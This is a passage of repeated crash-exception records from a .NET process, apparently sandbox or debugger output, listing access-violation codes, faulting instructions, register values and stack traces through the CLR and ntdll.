_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483284
registers.edi: 33483532
registers.eax: 0
registers.ebp: 33483544
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd2d18
0x7fd27c9
0x7fd26fd
0x7fd17e0
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483520
registers.edi: 33483804
registers.eax: 0
registers.ebp: 33483528
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 39229136
1 0 0

__exception__

stacktrace:
0x7fd2906
0x7fd27c9
0x7fd26fd
0x7fd17e0
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483284
registers.edi: 33483532
registers.eax: 0
registers.ebp: 33483544
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd2d18
0x7fd27c9
0x7fd26fd
0x7fd17e0
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483520
registers.edi: 33483804
registers.eax: 0
registers.ebp: 33483528
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 40659956
1 0 0

__exception__

stacktrace:
0x7fd752d
0x7fd7400
0x7fd26e5
0x7fd1f58
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483244
registers.edi: 33483492
registers.eax: 0
registers.ebp: 33483504
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd79ae
0x7fd7400
0x7fd26e5
0x7fd1f58
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483480
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483488
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 42224612
1 0 0

__exception__

stacktrace:
0x7fd752d
0x7fd7400
0x7fd26fd
0x7fd1f58
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483244
registers.edi: 33483492
registers.eax: 0
registers.ebp: 33483504
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd79ae
0x7fd7400
0x7fd26fd
0x7fd1f58
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483480
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483488
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 43575912
1 0 0

__exception__

stacktrace:
0x7fd752d
0x7fd7400
0x7fd26fd
0x7fd1f58
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483244
registers.edi: 33483492
registers.eax: 0
registers.ebp: 33483504
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd79ae
0x7fd7400
0x7fd26fd
0x7fd1f58
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483480
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483488
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37938788
registers.ecx: 38621772
1 0 0

__exception__

stacktrace:
0x7fd7c7c
0x7fd7b30
0x7fd26e5
0x7fd205a
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483308
registers.edi: 33483556
registers.eax: 0
registers.ebp: 33483568
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd7f52
0x7fd7b30
0x7fd26e5
0x7fd205a
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483544
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483552
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 39973136
1 0 0

__exception__

stacktrace:
0x7fd7c7c
0x7fd7b30
0x7fd26fd
0x7fd205a
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483308
registers.edi: 33483556
registers.eax: 0
registers.ebp: 33483568
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd7f52
0x7fd7b30
0x7fd26fd
0x7fd205a
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483544
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483552
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 41467792
1 0 0

__exception__

stacktrace:
0x7fd7c7c
0x7fd7b30
0x7fd26fd
0x7fd205a
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483308
registers.edi: 33483556
registers.eax: 0
registers.ebp: 33483568
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd7f52
0x7fd7b30
0x7fd26fd
0x7fd205a
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
